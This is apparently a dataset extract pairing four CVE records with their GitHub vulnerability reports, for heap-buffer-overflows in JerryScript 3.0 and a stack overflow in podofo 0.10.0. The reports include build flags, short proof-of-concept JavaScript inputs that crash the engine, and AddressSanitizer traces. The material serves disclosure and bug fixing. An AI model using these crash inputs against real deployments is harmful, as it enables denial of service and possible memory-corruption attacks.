#1 0x83ec157 in jerry_port_source_read jerryscript/jerry-port/common/jerry-port-fs.c:72:45
#2 0x83ea7ce in jerryx_source_parse_script jerryscript/jerry-ext/util/sources.c:33:28
#3 0x83eac11 in jerryx_source_exec_script jerryscript/jerry-ext/util/sources.c:63:26
#4 0x812162c in main jerryscript/jerry-main/main-desktop.c:156:20
#5 0xf7bc3ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
SUMMARY: AddressSanitizer: heap-buffer-overflow jerryscript/jerry-core/parser/js/js-lexer.c:3297:9 in lexer_compare_identifier_to_chars
Shadow bytes around the buggy address:
0x3ea800d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea800e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea800f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea80100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea80110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3ea80120: fa fa 00 00 04 fa fa fa 00 00 00[02]fa fa 00 00
0x3ea80130: 00 fa fa fa 00 00 00 00 fa fa 00 00 04 fa fa fa
0x3ea80140: 00 00 00 00 fa fa 00 00 03 fa fa fa 00 00 00 fa
0x3ea80150: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
0x3ea80160: 00 fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
0x3ea80170: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3572558==ABORTING
```
Credits:
@Ye0nny, @EJueon of the seclab-yonsei.
| heap-buffer-overflow in lexer_compare_identifier_to_chars | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5066/comments | 0 | 2023-04-08T12:50:49Z | 2024-11-22T09:18:15Z | https://github.com/jerryscript-project/jerryscript/issues/5066 | 1,659,514,220 | 5,066 | 5,105 |
CVE-2023-31907 | 2023-05-10T15:15:10.353 | Jerryscript 3.0.0 was discovered to contain a heap-buffer-overflow via the component scanner_literal_is_created at /jerry-core/parser/js/js-scanner-util.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5073"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5073"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/jerryscript-project/jerryscript/issues/5073 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
<details><summary>testcase</summary>
<p>
```javascript
class s extends Uint32Array { static [ null ] ; [ null ] ; static [ null ] ; static set ( ) { } static { } ; } const n = new s ( t ) ; const t = BigInt ( ) ; assert ( n === Uint32Array ) ;
```
</p>
</details>
```javascript
// poc.js
class s extends Uint32Array { static { } ; } const n = new s ( ) ; const t = BigInt ( ) ;
```
###### Execution steps & Output
```
$ ./jerryscript/build/bin/jerry poc.js
=================================================================
==3080358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf510068c at pc 0x566887dc bp 0xfff81e68 sp 0xfff81e58
READ of size 2 at 0xf510068c thread T0
#0 0x566887db in scanner_literal_is_created ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2922
#1 0x566f8265 in parser_parse_var_statement ./jerryscript/jerry-core/parser/js/js-parser-statm.c:523
#2 0x566fda21 in parser_parse_statements ./jerryscript/jerry-core/parser/js/js-parser-statm.c:3021
#3 0x5667eb25 in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2280
#4 0x566113cf in jerry_parse_common ./jerryscript/jerry-core/api/jerryscript.c:412
#5 0x56611631 in jerry_parse ./jerryscript/jerry-core/api/jerryscript.c:480
#6 0x56706644 in jerryx_source_parse_script ./jerryscript/jerry-ext/util/sources.c:52
#7 0x56706701 in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:63
#8 0x56609d04 in main ./jerryscript/jerry-main/main-desktop.c:156
#9 0xf7627ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
#10 0x5660cfb4 in _start (./jerryscript/build/bin/jerry+0x12fb4)
0xf510068c is located 4 bytes to the left of 8-byte region [0xf5100690,0xf5100698)
allocated by thread T0 here:
#0 0xf7a10817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x5660cae4 in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x56671d8d in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x566f25ab in parser_malloc ./jerryscript/jerry-core/parser/js/js-parser-mem.c:43
#4 0x56686c95 in scanner_create_variables ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2341
#5 0x5667eae1 in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2277
#6 0x566113cf in jerry_parse_common ./jerryscript/jerry-core/api/jerryscript.c:412
#7 0x56611631 in jerry_parse ./jerryscript/jerry-core/api/jerryscript.c:480
#8 0x56706644 in jerryx_source_parse_script ./jerryscript/jerry-ext/util/sources.c:52
#9 0x56706701 in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:63
#10 0x56609d04 in main ./jerryscript/jerry-main/main-desktop.c:156
#11 0xf7627ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
SUMMARY: AddressSanitizer: heap-buffer-overflow ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2922 in scanner_literal_is_created
Shadow bytes around the buggy address:
0x3ea20080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200c0: fa fa fa fa fa fa 05 fa fa fa 05 fa fa fa fd fd
=>0x3ea200d0: fa[fa]00 fa fa fa 00 04 fa fa fd fd fa fa fd fd
0x3ea200e0: fa fa fd fd fa fa 00 07 fa fa 00 06 fa fa 00 03
0x3ea200f0: fa fa 00 07 fa fa 00 00 fa fa fa fa fa fa fa fa
0x3ea20100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3080358==ABORTING
```
---
with debugging mode(--debug)
###### Outputs
```
ICE: Assertion 'scope_stack_p > context_p->scope_stack_p' failed at ./jerryscript/jerry-core/parser/js/js-scanner-util.c(scanner_literal_is_created):2920.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
```
Credits: @Ye0nny, @EJueon of the seclab-yonsei.
| heap-buffer-overflow in scanner_literal_is_created | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5073/comments | 0 | 2023-04-19T12:27:29Z | 2023-04-19T12:27:29Z | https://github.com/jerryscript-project/jerryscript/issues/5073 | 1,674,802,543 | 5,073 | 5,106 |
CVE-2023-31908 | 2023-05-10T15:15:10.533 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain a heap-buffer-overflow via the component ecma_builtin_typedarray_prototype_sort. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5067"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5067"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6DB8D818-8F21-4FD3-8D4D-A024A6346CB4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/jerryscript-project/jerryscript/issues/5067 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
``` JavaScript
// poc.js
a = new Int16Array ( 1073741825 ) . sort ( ) ;
```
###### Execution steps & Output
```sh
$ ./jerryscript/build/bin/jerry poc.js
==3598395==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf5100634 at pc 0x5666342e bp 0xffaaafb8 sp 0xffaaafa8
WRITE of size 4 at 0xf5100634 thread T0
#0 0x5666342d in ecma_builtin_typedarray_prototype_sort /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1261
#1 0x5666342d in ecma_builtin_typedarray_prototype_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:2007
#2 0x5665ea28 in ecma_builtin_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#3 0x5665ea28 in ecma_builtin_dispatch_call /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#4 0x56673db7 in ecma_op_function_call_native_built_in /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#5 0x56675c84 in ecma_op_function_call /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#6 0x566d6e89 in opfunc_call /jerryscript/jerry-core/vm/vm.c:758
#7 0x566d6e89 in vm_execute /jerryscript/jerry-core/vm/vm.c:5217
#8 0x566d8152 in vm_run /jerryscript/jerry-core/vm/vm.c:5312
#9 0x566d838f in vm_run_global /jerryscript/jerry-core/vm/vm.c:286
#10 0x5663682e in jerry_run /jerryscript/jerry-core/api/jerryscript.c:548
#11 0x5672b354 in jerryx_repl /jerryscript/jerry-ext/util/repl.c:66
#12 0x5662ef56 in main /jerryscript/jerry-main/main-desktop.c:226
#13 0xf7621ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
#14 0x56631fb4 in _start (/jerryscript/build/bin/jerry+0x12fb4)
0xf5100634 is located 0 bytes to the right of 4-byte region [0xf5100630,0xf5100634)
allocated by thread T0 here:
#0 0xf7a0a817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x56631ae4 in jmem_heap_alloc /jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x56696d8d in jmem_heap_gc_and_alloc_block /jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x56663281 in ecma_builtin_typedarray_prototype_sort /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1248
#4 0x56663281 in ecma_builtin_typedarray_prototype_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:2007
#5 0x5665ea28 in ecma_builtin_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
#6 0x5665ea28 in ecma_builtin_dispatch_call /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
#7 0x56673db7 in ecma_op_function_call_native_built_in /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
#8 0x56675c84 in ecma_op_function_call /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
#9 0x566d6e89 in opfunc_call /jerryscript/jerry-core/vm/vm.c:758
#10 0x566d6e89 in vm_execute /jerryscript/jerry-core/vm/vm.c:5217
#11 0x566d8152 in vm_run /jerryscript/jerry-core/vm/vm.c:5312
#12 0x566d838f in vm_run_global /jerryscript/jerry-core/vm/vm.c:286
#13 0x5663682e in jerry_run /jerryscript/jerry-core/api/jerryscript.c:548
#14 0x5672b354 in jerryx_repl /jerryscript/jerry-ext/util/repl.c:66
#15 0x5662ef56 in main /jerryscript/jerry-main/main-desktop.c:226
#16 0xf7621ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
SUMMARY: AddressSanitizer: heap-buffer-overflow /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1261 in ecma_builtin_typedarray_prototype_sort
Shadow bytes around the buggy address:
0x3ea20070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea200b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3ea200c0: fa fa fa fa fa fa[04]fa fa fa 00 fa fa fa 00 00
0x3ea200d0: fa fa 00 02 fa fa 05 fa fa fa 00 00 fa fa 00 fa
0x3ea200e0: fa fa 00 04 fa fa fd fd fa fa 00 06 fa fa 00 03
0x3ea200f0: fa fa 00 07 fa fa 00 00 fa fa fa fa fa fa fa fa
0x3ea20100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea20110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3598395==ABORTING
```
---
with debugging mode(--debug)
###### Outputs
```
ICE: Assertion 'buffer_index == info_p->length' failed at /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c(ecma_builtin_typedarray_prototype_sort):1265.
Error: JERRY_FATAL_FAILED_ASSERTION
```
credits: @EJueon, @Ye0nny of the seclab-yonsei.
| heap-buffer-overflow in ecma_builtin_typedarray_prototype_sort | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5067/comments | 0 | 2023-04-08T13:31:08Z | 2023-04-08T13:39:28Z | https://github.com/jerryscript-project/jerryscript/issues/5067 | 1,659,524,592 | 5,067 | 5,107 |
CVE-2023-31910 | 2023-05-10T15:15:10.697 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain a heap-buffer-overflow via the component parser_parse_function_statement at /jerry-core/parser/js/js-parser-statm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5076"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5076"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/jerryscript-project/jerryscript/issues/5076 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7)
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
```
###### Test case
<details><summary>testcase</summary>
<p>
```JavaScript
class s extends WeakMap { static { newObj } ; } function func0 ( [ " " ] = 2 , { static { 536870912 } has ( ) ; assert ( a instanceof s ) ) .
```
</p>
</details>
``` JavaScript
// poc.js
class s extends WeakMap { static { } ; }
function func0 ( static { 536870912 } )
```
###### Execution steps & Output
```sh
$ ./jerryscript/build/bin/jerry poc.js
=================================================================
==2433547==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf50006ac at pc 0x566ef7ff bp 0xffa35298 sp 0xffa35288
READ of size 2 at 0xf50006ac thread T0
#0 0x566ef7fe in parser_parse_function_statement /jerryscript/jerry-core/parser/js/js-parser-statm.c:696
#1 0x566f3001 in parser_parse_statements /jerryscript/jerry-core/parser/js/js-parser-statm.c:2809
#2 0x56677b25 in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2280
#3 0x5660a3cf in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:412
#4 0x5660a631 in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:480
#5 0x566ff644 in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52
#6 0x566ff701 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63
#7 0x56602d04 in main /jerryscript/jerry-main/main-desktop.c:156
#8 0xf75faed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
#9 0x56605fb4 in _start (/jerryscript/build/bin/jerry+0x12fb4)
0xf50006ac is located 4 bytes to the left of 8-byte region [0xf50006b0,0xf50006b8)
allocated by thread T0 here:
#0 0xf79e3817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x56605ae4 in jmem_heap_alloc /jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x5666ad8d in jmem_heap_gc_and_alloc_block /jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x566eb5ab in parser_malloc /jerryscript/jerry-core/parser/js/js-parser-mem.c:43
#4 0x5667fc95 in scanner_create_variables /jerryscript/jerry-core/parser/js/js-scanner-util.c:2341
#5 0x56677ae1 in parser_parse_source /jerryscript/jerry-core/parser/js/js-parser.c:2277
#6 0x5660a3cf in jerry_parse_common /jerryscript/jerry-core/api/jerryscript.c:412
#7 0x5660a631 in jerry_parse /jerryscript/jerry-core/api/jerryscript.c:480
#8 0x566ff644 in jerryx_source_parse_script /jerryscript/jerry-ext/util/sources.c:52
#9 0x566ff701 in jerryx_source_exec_script /jerryscript/jerry-ext/util/sources.c:63
#10 0x56602d04 in main /jerryscript/jerry-main/main-desktop.c:156
#11 0xf75faed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/aifuzz/targets/jerryscript_afl_asan2/jerry-core/parser/js/js-parser-statm.c:696 in parser_parse_function_statement
Shadow bytes around the buggy address:
0x3ea00080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea00090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea000a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea000b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea000c0: fa fa 05 fa fa fa 00 00 fa fa 00 07 fa fa 05 fa
=>0x3ea000d0: fa fa fd fd fa[fa]00 fa fa fa 00 04 fa fa fd fd
0x3ea000e0: fa fa fd fd fa fa fd fd fa fa 00 06 fa fa 00 03
0x3ea000f0: fa fa 00 07 fa fa 00 00 fa fa fa fa fa fa fa fa
0x3ea00100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea00110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea00120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2433547==ABORTING
```
---
with debugging mode(--debug)
###### Outputs
```
ICE: Assertion 'context_p->scope_stack_top >= 2' failed at /jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_function_statement):691.
Error: JERRY_FATAL_FAILED_ASSERTION
```
If I had to guess, This seems to be happening due to similar reasons as #5056.
credits: @EJueon, @Ye0nny of the seclab-yonsei.
| heap-buffer-overflow in parser_parse_function_statement | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5076/comments | 0 | 2023-04-23T16:01:47Z | 2023-04-23T16:01:47Z | https://github.com/jerryscript-project/jerryscript/issues/5076 | 1,680,076,342 | 5,076 | 5,108 |
CVE-2023-31556 | 2023-05-10T16:15:12.367 | podofoinfo 0.10.0 was discovered to contain a segmentation violation via the function PoDoFo::PdfDictionary::findKeyParent. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/podofo/podofo/issues/66"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/podofo/podofo/issues/66"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:podofo_project:podofo:0.10.0:-:*:*:*:*:*:*",
"matchCriteriaId": "E83D1F81-EBA4-47E8-BA9A-23EBABDB99BD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/podofo/podofo/issues/66 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"podofo",
"podofo"
] | We found a stack overflow on podofo 0.10.0.
**Command Input**
`podofopdfinfo poc_file
`
poc_file are attached.
**Sanitizer Dump**
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2639991==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd0a39ff88 (pc 0x0000004ab656 bp 0x7ffd0a3a07d0 sp 0x7ffd0a39ff90 T0)
